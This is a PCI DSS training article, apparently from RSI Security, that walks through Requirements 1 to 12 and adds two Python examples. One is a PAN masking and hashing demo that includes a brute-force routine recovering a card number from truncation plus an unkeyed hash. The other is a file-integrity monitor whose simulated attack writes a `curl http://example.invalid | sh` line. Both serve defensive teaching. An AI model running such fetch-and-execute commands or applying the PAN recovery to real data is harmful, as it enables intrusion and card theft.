Companies that accept credit card payments and store, process, or transmit cardholder data (CHD) need to comply with the Payment Card Industry (PCI) Data Security Standard (DSS). The best way to ensure compliance across your staff is to conduct rigorous PCI training sessions covering all required responsibilities to protect CHD.
Essential Topics for Enterprise PCI Compliance Training
An enterprise’s PCI compliance training program should focus on the six goals from the DSS:
- PCI DSS Goal #1: Building Secure Networks and Systems
- PCI DSS Goal #2: Safeguarding All Cardholder Data (CHD)
- PCI DSS Goal #3: Maintaining Vulnerability Management
- PCI DSS Goal #4: Implementing Access Control Measures
- PCI DSS Goal #5: Monitoring and Testing Networks Regularly
- PCI DSS Goal #6: Maintaining Information Security Policies
Companies should break down the Requirements and primary sub-requirements within each, along with guidance on how each individual can ensure they are actively following each one.
PCI DSS Goal #1: Building Secure Networks and Systems
The most foundational aim of the PCI DSS—and your PCI training program—concerns basic cybersecurity architecture implementation. The first goal incorporates this aim within its two Requirements:
- Requirement 1 – Establish and update firewall configurations to protect cardholder data:
- 1.1: Establish firewall and router configuration standards, including a formal process for approving and testing all network connections, a current network diagram, a diagram of cardholder data flows, and a documented business justification for every permitted service, protocol, and port.
- 1.2: Build firewall and router configurations that restrict connections between untrusted networks and any system component in the cardholder data environment (CDE), denying all traffic that is not explicitly required.
- 1.3: Prohibit direct public access between the Internet and any system component in the CDE: place public-facing services in a demilitarized zone (DMZ), implement anti-spoofing measures, and do not disclose private IP addresses or routing information to unauthorized parties.
- 1.4: Install personal firewall software (or equivalent functionality) on portable devices, whether company- or employee-owned, that connect to the Internet when outside the corporate network and are also used to access the CDE.
- 1.5: Formalize policies and procedures pertaining to firewall and router security configurations and ensure that documentation is accessible to all stakeholders.
- Requirement 2 – Replace all default security configurations supplied by your vendors:
- 2.1: Change all vendor-supplied defaults and remove or disable unnecessary default accounts before installing a system on the network; for wireless environments connected to the CDE, change all wireless vendor defaults as well (encryption keys, passwords, SNMP community strings).
- 2.2: Develop configuration standards for all system components that address known security vulnerabilities and are consistent with industry-accepted hardening standards (e.g., CIS, NIST); enable only the services, protocols, and daemons that are necessary, and implement one primary function per server.
- 2.3: Encrypt all non-console administrative access using strong cryptography (e.g., SSH, TLS, or VPN); cleartext administrative protocols such as Telnet are not acceptable.
- 2.4: Maintain an inventory of all system components, physical and virtual, that are in scope for PCI DSS.
- 2.5: Ensure that security policies and operational procedures for managing vendor defaults and other security parameters are documented, in use, and known to all affected parties.
- 2.6: Shared hosting providers must protect each entity's hosted environment and cardholder data, meeting the additional requirements the standard places on them.
PCI DSS Goal #2: Safeguarding All Cardholder Data (CHD)
The PCI DSS’s second goal is establishing protections for all cardholder data—both in storage and in transit—per two Requirements. Make sure your PCI training addresses:
- Requirement 3 – Protect stored cardholder data:
- 3.1: Keep CHD storage to a minimum through data retention and disposal policies; run a process at least quarterly to identify and securely delete stored CHD that exceeds the defined retention period.
- 3.2: Do not store sensitive authentication data (full track data, card verification codes such as CVV2/CVC2/CID, and PINs or PIN blocks) after authorization, even if encrypted; only issuers with a documented business justification may retain it.
- 3.3: Mask PAN when displayed so that the first six and last four digits are the most that appear; only personnel with a legitimate business need may see more of the PAN.
- 3.4: Render PAN unreadable anywhere it is stored (including portable media, backups, and logs) using a one-way hash based on strong cryptography over the entire PAN, truncation, index tokens and pads, or strong cryptography with associated key management. Where a hashed and a truncated form of the same PAN both exist, ensure they cannot be correlated to reconstruct the original PAN.
- 3.5: Document and implement procedures to protect the keys used to secure stored CHD against disclosure and misuse: restrict key access to the fewest custodians necessary and store keys securely (e.g., in an HSM, or encrypted under a key-encrypting key stored separately).
- 3.6: Fully document and implement key-management processes for the cryptographic keys used to encrypt CHD, covering generation, distribution, storage, periodic change at the end of the defined cryptoperiod, and retirement or replacement of keys that are weakened or suspected of compromise.
- 3.7: Formalize policies and procedures pertaining to safeguarding CHD in storage and ensure that documentation is accessible to all stakeholders.
- Requirement 4 – Encrypt cardholder data for transmission over unsecured networks:
- 4.1: Use strong cryptography and security protocols (e.g., TLS 1.2 or higher, IPsec, SSH) to safeguard CHD during transmission over open, public networks; accept only trusted keys and certificates, and allow only secure protocol versions and configurations (SSL and early TLS are not acceptable).
- 4.2: Never send unprotected PANs by end-user messaging technologies (e.g., email, SMS, instant messaging, chat).
- 4.3: Formalize policies and procedures pertaining to encrypting CHD for safe transmission and ensure that documentation is accessible to all stakeholders.
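Requirements 3.3, 3.4 and 4.2 describe techniques rather than policies, so the following is an added example, written for this page and not taken from the article or from RSI Security: it finds PANs in free text with a Luhn check (the detection a 4.2 messaging control needs), masks them for display, renders them unreadable for storage, and then demonstrates the 3.4 caveat by recovering a PAN from a first-six/last-four truncation plus an unkeyed hash of the same PAN. The sample message, the HMAC key and the `insecure_unkeyed_hash` helper are constructed for illustration; the two card numbers are public Visa and Mastercard test numbers, not real cards.

```python
"""Added example: PAN detection, masking and irreversible storage per PCI DSS
3.3 / 3.4 / 4.2. Sample data and keys are constructed for illustration."""
import hashlib
import hmac
import re
from typing import List, Optional

# Candidate PAN: 13-19 digits, optionally separated by single spaces or hyphens,
# and not embedded in a longer digit run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def _luhn_sum(digits: str) -> int:
    """Luhn (mod-10) weighted sum: every digit in an odd position counted from
    the right is doubled, with 9 subtracted when the result exceeds 9."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total


def luhn_valid(digits: str) -> bool:
    """Every PAN passes Luhn; most random digit runs (order IDs, phone numbers) do not."""
    return _luhn_sum(digits) % 10 == 0


def find_pans(text: str) -> List[str]:
    """Return digits-only PANs found in free text such as an outbound email or
    chat message, which is the check a 4.2 control has to make."""
    found = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            found.append(digits)
    return found


def mask_pan(pan: str) -> str:
    """3.3: the first six and last four digits are the most that may be displayed."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def truncate_pan(pan: str) -> str:
    """3.4 truncation: the middle digits are discarded permanently."""
    return pan[:6] + pan[-4:]


def hash_pan(pan: str, key: bytes) -> str:
    """3.4 one-way hash over the entire PAN, keyed (HMAC-SHA256) because the
    PAN space is small enough to brute-force an unkeyed hash."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def insecure_unkeyed_hash(pan: str) -> str:
    """The weak practice the 3.4 note warns about: a bare SHA-256 of the PAN."""
    return hashlib.sha256(pan.encode()).hexdigest()


# Inverse of the Luhn doubling step, so one missing digit can be solved for directly.
_UNDOUBLE = {(d * 2 - 9 if d > 4 else d * 2): d for d in range(10)}


def _solve_luhn_digit(partial: str, pos: int) -> str:
    """Return the digit for index pos (which holds a '0' placeholder in
    partial) that makes the whole string pass the Luhn check."""
    need = (-_luhn_sum(partial)) % 10
    doubled = (len(partial) - 1 - pos) % 2 == 1
    return str(_UNDOUBLE[need] if doubled else need)


def recover_pan(truncated: str, unkeyed_sha256: str, pan_len: int = 16) -> Optional[str]:
    """Attacker's view of the 3.4 caveat: with first six and last four known
    and an unkeyed SHA-256 of the same PAN, Luhn leaves only 10**(pan_len-11)
    candidates, so the full PAN falls out in well under a second.
    Returns None when the stored hash was keyed (the attacker lacks the key)."""
    first6, last4 = truncated[:6], truncated[6:]
    unknown = pan_len - 10
    pos = 6 + unknown - 1                      # index of the digit Luhn fixes
    for n in range(10 ** (unknown - 1)):
        middle = f"{n:0{unknown - 1}d}"
        partial = first6 + middle + "0" + last4
        candidate = first6 + middle + _solve_luhn_digit(partial, pos) + last4
        if hashlib.sha256(candidate.encode()).hexdigest() == unkeyed_sha256:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: two public test PANs and a 13-digit order number that
    # looks like a card number but fails Luhn.
    message = ("Customer 4111 1111 1111 1111 and 5500-0000-0000-0004 called "
               "about order 1234567890123.")
    for pan in find_pans(message):
        print(mask_pan(pan), truncate_pan(pan), hash_pan(pan, b"\x01" * 32)[:16])
    pan = "4111111111111111"
    print("recovered from truncation + unkeyed hash:",
          recover_pan(truncate_pan(pan), insecure_unkeyed_hash(pan)))
    print("recovered from truncation + keyed hash:",
          recover_pan(truncate_pan(pan), hash_pan(pan, b"\x01" * 32)))
```

The brute force is the practical reason behind the 3.4 note: a truncated PAN and an unkeyed hash of the same PAN stored side by side are, in effect, the PAN. Keying the hash (or tokenizing instead) closes that gap, provided the key is managed under 3.5 and 3.6 and is never stored with the data.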
PCI DSS Goal #3: Maintaining Vulnerability Management
The third aim within the PCI DSS framework concerns threat and vulnerability management. Therefore, a robust PCI training program needs to detail the following Requirements and sub-requirements:
- Requirement 5 – Protect against malware with regular updates to antivirus software:
- 5.1: Deploy anti-virus software on all systems commonly affected by malware (particularly personal computers and servers); it must detect, remove, and protect against all known types of malware. For systems not commonly affected, periodically evaluate evolving threats to confirm that is still the case.
- 5.2: Keep all anti-virus mechanisms current, perform periodic scans, and generate audit logs that are retained per Requirement 10.7.
- 5.3: Ensure anti-virus mechanisms are actively running and cannot be disabled or altered by users unless specifically authorized by management on a case-by-case basis for a limited period.
- 5.4: Ensure that security policies and operational procedures for protecting systems against malware are documented, in use, and known to all affected parties.
- Requirement 6 – Develop secure applications and systems and maintain their security:
- 6.1: Establish a process to identify security vulnerabilities using reputable outside sources (vendor advisories, CVE/NVD feeds) and assign a risk ranking (e.g., critical, high, medium) to newly discovered vulnerabilities.
- 6.2: Protect all system components and software from known vulnerabilities by installing applicable vendor-supplied security patches; critical patches must be installed within one month of release, and other patches within a timeframe set by your risk ranking.
- 6.3: Develop internal and external software securely, in accordance with PCI DSS and industry standards and best practices, with security built into every phase of the development lifecycle; remove development, test, and custom application accounts, user IDs, and passwords before release, and review custom code for vulnerabilities before it reaches production.
- 6.4: Follow change control processes for all changes to system components: separate development and test environments from production, separate duties between them, never use live PANs for testing, remove test data and accounts before going live, and document each change's impact, approval, functional testing, and back-out procedure.
- 6.5: Address common coding vulnerabilities in the development process and train developers at least annually in up-to-date secure coding techniques; cover at minimum injection flaws, buffer overflows, insecure cryptographic storage, insecure communications, improper error handling, cross-site scripting (XSS), improper access control, cross-site request forgery (CSRF), and broken authentication and session management.
- 6.6: For public-facing web applications, either review them with manual or automated application vulnerability assessment tools at least annually and after any change, correcting what is found, or deploy an automated technical solution that detects and prevents web-based attacks (e.g., a web application firewall) in front of them and keep it current.
- 6.7: Formalize policies and procedures pertinent to developing secure systems and applications and ensure that documentation is accessible to all stakeholders.
PCI DSS Goal #4: Implementing Access Control Measures
The fourth aim of PCI DSS involves access control via logical access restrictions, identity and authentication management, and physical safeguards. PCI DSS compliance training should cover the following access control Requirements:
- Requirement 7 – Restrict all cardholder data access by “business need to know”:
- 7.1: Limit all access to system components containing or connected to CHD to individuals whose job descriptions specify a need to access these systems.
- 7.2: Establish access control restrictions that “deny all” requests for data access that don’t meet specific needs related to business functions or job descriptions.
- 7.3: Formalize policies and procedures pertaining to business-necessary access restrictions and ensure that documentation is accessible to all stakeholders.
- Requirement 8 – Authenticate identities of all individuals granted system access:
- 8.1: Define and implement policies for user identification management for non-consumer users and administrators: assign a unique ID to every user before granting access; control additions, deletions, and modifications of IDs; revoke access for terminated users immediately; remove or disable accounts inactive for 90 days; lock accounts for at least 30 minutes after no more than six failed attempts; and require re-authentication after 15 minutes of session idle time.
- 8.2: Authenticate all non-consumer users and administrators with at least one factor: something you know (password or passphrase), something you have (token device or smart card), or something you are (biometric). Render all credentials unreadable during transmission and storage with strong cryptography; verify identity before modifying credentials; and require passwords of at least seven characters containing both letters and numbers, changed at least every 90 days and not identical to any of the last four used.
- 8.3: Secure all individual non-console administrative access into the CDE and all remote network access originating from outside the entity's network with multi-factor authentication (at least two of the three factor types).
- 8.4: Document and communicate authentication policies and procedures to all users, including guidance on selecting strong credentials, protecting them, not reusing them, and changing them if compromise is suspected.
- 8.5: Do not use group, shared, or generic IDs, passwords, or other authentication methods; disable or remove any that exist so that every action can be traced to an individual.
- 8.6: Where other authentication mechanisms are used (e.g., physical or logical security tokens, smart cards, certificates), assign each to a single individual account rather than sharing it, and enforce through physical and/or logical controls that only the intended account can use it.
- 8.7: Restrict all access to any database containing CHD: all user access, queries, and actions on the database occur through programmatic methods (e.g., stored procedures); only database administrators can directly access or query the database; and application IDs for database applications may be used only by the applications themselves, not by individual users or other non-application processes.
- 8.8: Formalize user authentication policies and procedures and ensure that documentation is accessible to all stakeholders.
- Requirement 9 – Restrict physical access to systems containing cardholder data:
- 9.1: Restrict and monitor physical access to systems containing or connected to CHD with surveillance devices (e.g., cameras) and physical barriers (e.g., security code doors).
- 9.2: Develop mechanisms to swiftly and easily distinguish personnel from on-site visitors and adjust or revoke permissions and access privileges, as needed.
- 9.3: Restrict all physical access to sensitive areas for all personnel; authorization must be based on job-function necessity and subject to immediate removal.
- 9.4: Implement policies to authorize (badge) all visitors before entering sensitive spaces, provide escorts, retrieve badges upon departure, and log all visits.
- 9.5: Secure all media physically, including secure storage of backups in a distinct, physically secured location—ideally off-site and subject to annual security audits at a minimum.
- 9.6: Strictly control all media’s internal and external distribution by classifying it, sending it through secured couriers with tracking, and approving all movements.
- 9.7: Implement maximal control over all physical media storage and accessibility, including compiling inventory logs and conducting audits at regular intervals (at least annually).
- 9.8: Ensure media is safely destroyed (e.g., incinerated, shredded) when its retention is no longer required for a business, legal, mission, or other reason.
- 9.9: Protect devices that capture payment card data through direct physical interaction with the card (e.g., POS terminals, PIN pads) from tampering and substitution: maintain an up-to-date list of devices, periodically inspect them, and train personnel to spot tampering and to verify the identity of third-party technicians before granting access.
- 9.10: Formalize policies and procedures pertaining to restricting all physical access to CHD and ensure that documentation is accessible to all stakeholders.
PCI DSS Goal #5: Monitoring and Testing Networks Regularly
The fifth aim of the PCI DSS framework concerns assessing the efficacy of security measures through access monitoring and system audits, per two Requirements. This element of PCI training should cover:
- Requirement 10 – Track and monitor all access to network resources and cardholder data:
- 10.1: Implement audit trails that link all access to system components to an individual user.
- 10.2: Implement automated audit trails for all system components so the following can be reconstructed: each individual user's access to CHD; all actions taken by anyone with root or administrative privileges; access to the audit trails themselves; invalid logical access attempts; use of and changes to identification and authentication mechanisms (including privilege elevation and changes to root or administrative accounts); initialization, stopping, or pausing of audit logs; and creation or deletion of system-level objects.
- 10.3: Record at least the following for each event: user identification, type of event, date and time, success or failure indication, origination of the event, and the identity or name of the affected data, system component, or resource.
- 10.4: Utilize time-synchronization technology to synchronize all system clocks connected to components in the CHD environment and protect all time data.
- 10.5: Secure audit trails to prevent all unauthorized viewing or modification; back up all audit trail logs and implement file integrity monitoring (FIM).
- 10.6: Review logs and security events for all system components to identify anomalies or suspicious activity. Review at least daily all security events, the logs of every component that stores, processes, or transmits CHD, the logs of all critical system components, and the logs of servers and components that perform security functions (firewalls, IDS/IPS, authentication servers); review other logs periodically based on your risk assessment, and follow up on every exception and anomaly.
- 10.7: Retain all audit trail history for a minimum of one year and ensure that at least the three most recent months’ data is immediately and easily accessible.
- 10.8: Implement processes to detect, report on, and address any critical security system component failures. Note that this sub-requirement is only applicable to service providers.
- 10.9: Formalize policies and procedures pertaining to monitoring network access and ensure that documentation is accessible to all stakeholders.
- Requirement 11 – Perform regular assessments on security systems and processes:
- 11.1: Implement policies and procedures to monitor, detect, and identify all wireless access points to compile an inventory and develop an incident response plan for unauthorized detections; scan at least quarterly.
- 11.2: Run internal and external network vulnerability scans at least quarterly and after any significant change in the network; quarterly external scans must be performed by a PCI SSC Approved Scanning Vendor (ASV), and rescans must be repeated until passing results are obtained.
- 11.3: Implement regular penetration testing, including external and internal tests at least annually and after all significant changes; address all identified threats.
- 11.4: Monitor traffic and access to the CHD environments and notify stakeholders when suspected compromises occur, using intrusion detection/prevention tools.
- 11.5: Alert stakeholders when unauthorized modifications to critical files occur, using FIM or change-detection tools; perform file comparisons at least weekly.
- 11.6: Formalize policies and procedures pertaining to assessing security systems and processes and ensure that documentation is accessible to all stakeholders.
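Requirements 10.5 and 11.5 both come down to change detection over critical files, and the part assessors probe is whether the baseline itself can be silently rewritten along with the files. The following is an added example, written for this page rather than taken from the article or from RSI Security: a minimal file-integrity monitor that fingerprints every file under a directory, protects the stored baseline with an HMAC, and reports modified, added and deleted files. The directory layout, file names and contents and the key are constructed for illustration.

```python
"""Added example: a minimal file-integrity monitor of the kind PCI DSS 10.5
and 11.5 call for. The monitored tree and key are constructed for illustration."""
import hashlib
import hmac
import json
import secrets
import stat
import tempfile
from pathlib import Path
from typing import Dict, List


def fingerprint(path: Path) -> Dict[str, object]:
    """Content hash plus the metadata attackers commonly change (size, mode)."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = path.lstat()
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": stat.S_IMODE(st.st_mode)}


def build_baseline(root: Path) -> Dict[str, Dict[str, object]]:
    """Fingerprint every regular file under root, keyed by relative POSIX path."""
    return {p.relative_to(root).as_posix(): fingerprint(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def sign_baseline(baseline: Dict[str, Dict[str, object]], key: bytes) -> bytes:
    """Serialise canonically and attach an HMAC. Keep the key, and ideally the
    signed baseline, off the monitored host (10.5: logs and integrity data must
    not be alterable by whoever alters the system)."""
    payload = json.dumps(baseline, sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return json.dumps({"baseline": baseline, "hmac": tag}).encode()


def load_baseline(blob: bytes, key: bytes) -> Dict[str, Dict[str, object]]:
    """Reject a baseline whose HMAC does not verify."""
    doc = json.loads(blob)
    payload = json.dumps(doc["baseline"], sort_keys=True).encode()
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("baseline integrity check failed: tampered blob or wrong key")
    return doc["baseline"]


def compare(baseline: Dict[str, Dict[str, object]],
            current: Dict[str, Dict[str, object]]) -> Dict[str, List[str]]:
    """11.5 requires alerting on changes, additions and deletions alike."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
    }


def demo() -> Dict[str, List[str]]:
    """Baseline a constructed config tree, simulate unauthorised changes between
    two comparisons, and return what the comparison reports."""
    key = secrets.token_bytes(32)              # constructed; store it elsewhere in practice
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        etc = root / "etc"
        etc.mkdir()
        (etc / "sshd_config").write_text("PermitRootLogin no\nPasswordAuthentication no\n")
        (etc / "cde_firewall.rules").write_text("-A INPUT -s 10.0.0.0/8 -j ACCEPT\n-A INPUT -j DROP\n")
        (etc / "legacy.conf").write_text("obsolete\n")
        signed = sign_baseline(build_baseline(root), key)

        # Simulated attacker activity before the next (at least weekly) comparison.
        (etc / "sshd_config").write_text("PermitRootLogin yes\nPasswordAuthentication yes\n")
        (etc / "cron_helper.sh").write_text("#!/bin/sh\ncurl http://example.invalid | sh\n")
        (etc / "legacy.conf").unlink()

        return compare(load_baseline(signed, key), build_baseline(root))


def forged_baseline_rejected() -> bool:
    """Editing the stored baseline without the key must be detected."""
    key = b"\x02" * 32                         # constructed key
    signed = sign_baseline({"etc/sshd_config": {"sha256": "ab", "size": 40, "mode": 0o644}}, key)
    forged = signed.replace(b'"size": 40', b'"size": 41')
    try:
        load_baseline(forged, key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
    print("forged baseline rejected:", forged_baseline_rejected())
```

Running the module prints the three change classes for the constructed tree (the rewritten `sshd_config`, the new `cron_helper.sh`, the removed `legacy.conf`) and confirms that a hand-edited baseline fails verification. A production deployment would schedule the comparison at least weekly (11.5), alert on any non-empty result, and reconcile it against the change records kept under Requirement 6.4.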
PCI DSS Goal #6: Maintaining Information Security Policies
The final aim of PCI DSS compliance is to formalize all other security policies and procedures in readily accessible documents, per one requirement. PCI training should be considered part of your efforts to meet this goal. Make sure your staff is aware by covering:
- Requirement 12 – Maintain policies addressing security responsibilities for all staff:
- 12.1: Establish, publish, maintain, and disseminate a formal security policy; review it at least annually and update it when the environment changes (see Requirements 1.5, 2.5, 3.7, 4.3, 5.4, 6.7, 7.3, 8.8, 9.10, 10.9, and 11.6 above).
- 12.2: Implement risk assessment processes to be performed at regular intervals (at least annually), identifying and documenting critical threats and vulnerabilities.
- 12.3: Develop and disseminate proper use policies for all technologies, covering approval, authentication, inventory, accepted uses, and protocols for use control.
- 12.4: Ensure that formal security policies and procedures define clear roles and responsibilities for all personnel and that the policies are all easily accessible.
- 12.5: Assign responsibilities for documenting and distributing policies, monitoring behaviors, responding to incidents, maintaining accounts, and controlling access.
- 12.6: Implement a formal security awareness program so that all personnel know the cardholder data security policy and procedures; educate personnel upon hire and at least annually, and require them to acknowledge at least annually that they have read and understood the policy.
- 12.7: Screen individuals before and during hiring and onboarding, including background and reference checks, to reduce the potential for insider attacks.
- 12.8: Maintain a third party risk management (TPRM) program to monitor and contractually guarantee CHD safety with third parties who process or contact it.
- 12.9: Acknowledge in writing to customers that the service provider is responsible for the security of any CHD it possesses or otherwise stores, processes, or transmits on their behalf. Note that this sub-requirement is only applicable to service providers.
- 12.10: Implement a robust incident management program, ensuring readiness to respond to incidents in real time and minimize the extent of data leakage or loss.
- 12.11: Perform reviews at regular intervals (at least quarterly) to ensure that all personnel uphold DSS Requirements. Note that this sub-requirement is only applicable to service providers.
Rethink Your PCI Training, Compliance, and Security
RSI Security offers various PCI compliance services, including but not limited to comprehensive PCI DSS compliance training. To select individual PCI training modules for your entire staff or tailored workshops for select segments, contact RSI Security today!
We’ll help you rethink your company’s PCI compliance, cardholder data security, and overall cyberdefense.